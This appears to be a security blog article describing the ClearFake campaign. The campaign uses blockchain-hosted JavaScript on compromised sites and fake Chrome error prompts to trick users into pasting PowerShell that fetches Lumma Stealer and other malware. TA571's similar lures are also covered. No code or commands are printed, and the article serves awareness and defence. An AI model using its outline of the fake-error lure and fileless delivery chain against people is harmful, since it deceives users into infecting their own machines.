Threats ClearFake Campaigns Trick Users Into Copying and Executing Powershell Code

Cybersecurity defenses are often designed to counter sophisticated technical threats, yet the most critical vulnerability remains human behavior. Whether through malicious insiders with access to sensitive data, unintentional errors by employees, or clever social engineering tactics that manipulate trust, attackers continuously exploit human weaknesses to bypass security controls. 

Malicious insiders may sell confidential information, human error can lead to misconfigured systems, and social engineering schemes trick employees into divulging credentials or executing malicious code. Understanding and mitigating these human vulnerabilities is essential to building a resilient cybersecurity posture.

The Malicious ClearFake Framework

ClearFake is a malicious JavaScript framework that threat actors deploy on compromised websites to deliver malware through drive-by download techniques. Initially identified in the second quarter of 2023, ClearFake emerged as a newcomer to the “fake updates” threat landscape, targeting both Windows and macOS users with fraudulent browser update prompts.

The ClearFake campaign typically starts when a user unknowingly visits a compromised webpage. Once a victim reaches the compromised site, the JavaScript framework utilizes a technique known as EtherHiding, which involves loading scripts hosted on the blockchain via Binance’s Smart Chain contracts. If the script passed checks, it would then load a second script filtered through a Keitaro Traffic Distribution System (TDS). These prompts, which mimic legitimate browser errors or updates, encourage the user to run a PowerShell script, claiming it is necessary to fix a viewing problem or to install a security certificate.

The campaign's hallmark was the use of a malicious PowerShell script, which users were instructed to copy and execute. This script flushed the DNS cache, removed clipboard content, and downloaded an additional encrypted PowerShell script that retrieved a compressed ZIP archive. The archive contained legitimate executables that side-loaded a trojanized DLL. This DLL, in turn, used DOILoader to load Lumma Stealer, which downloaded additional malware, including Amadey Loader, a downloader for a crypto miner, a clipboard hijacker, and potentially other malware like JaskaGO.

The threat actors behind ClearFake have demonstrated an ability to innovate and evolve their tactics over time. While the campaign initially targeted Windows users, it expanded its scope to include macOS users in late 2023. The actors behind the ClearFake framework use sophisticated techniques such as:

• Blockchain-Based Obfuscation: The campaign utilizes the BSC and the Ethers JavaScript library to store and retrieve malicious code, making detection more complex.

• Fake Update Prompts: The campaign displays fraudulent error messages or update prompts within the browser, mimicking legitimate updates from browsers like Chrome and Safari.

• PowerShell-Based Execution: Victims are instructed to copy and run PowerShell scripts, which initiate the download and execution of the final payload.

Using Chrome Errors To Socially Engineer Victims

In their attempts to exploit users, attackers behind the ClearFake campaign created fake error messages mimicking Google Chrome browser errors. These errors were displayed as overlays on compromised websites, tricking users into believing that their browsers were malfunctioning. The error message would then prompt users to run a PowerShell script, allegedly to fix the issue.

Users Tricked Into Executing Powershell Script

By presenting fake errors and detailed instructions, the campaign induces users to copy and paste scripts into PowerShell terminals. Once executed, the scripts initiate a sequence of malware downloads, leading to infection.

This approach allows attackers to bypass antivirus and endpoint detection systems, as the malicious scripts are executed directly without a file download or the presence of a file on disk. This tactic also enables attackers to exploit a gap in the detection capabilities of many security solutions, making the campaign especially dangerous.

TA571 is Leveraging ClearFake

ClearFake is primarily linked to a cluster of threat actors known as the ClearFake activity cluster. This group is responsible for deploying the JavaScript framework on compromised websites. However, there are indications that other threat actors, such as TA571, may also be leveraging similar techniques in their campaigns.

TA571, an initial access broker observed since March 2024, uses malspam with file attachments to deliver PowerShell-based malware payloads through fake Microsoft Word and OneDrive error messages. While TA571 primarily focuses on email-based delivery, it shares many techniques with the ClearFake campaign, particularly the use of social engineering to get users to execute malicious PowerShell scripts manually.

Conclusion

ClearFake represents a new evolution in fake update campaigns, combining advanced obfuscation techniques with social engineering to deceive users into compromising their systems. By leveraging blockchain technology and manipulating user trust in legitimate updates, the threat actors behind ClearFake have created a potent and adaptable framework capable of impacting organizations across multiple sectors. As the campaign continues to evolve, heightened vigilance and robust cybersecurity defenses are essential for mitigating the risks posed by this advanced malware delivery technique.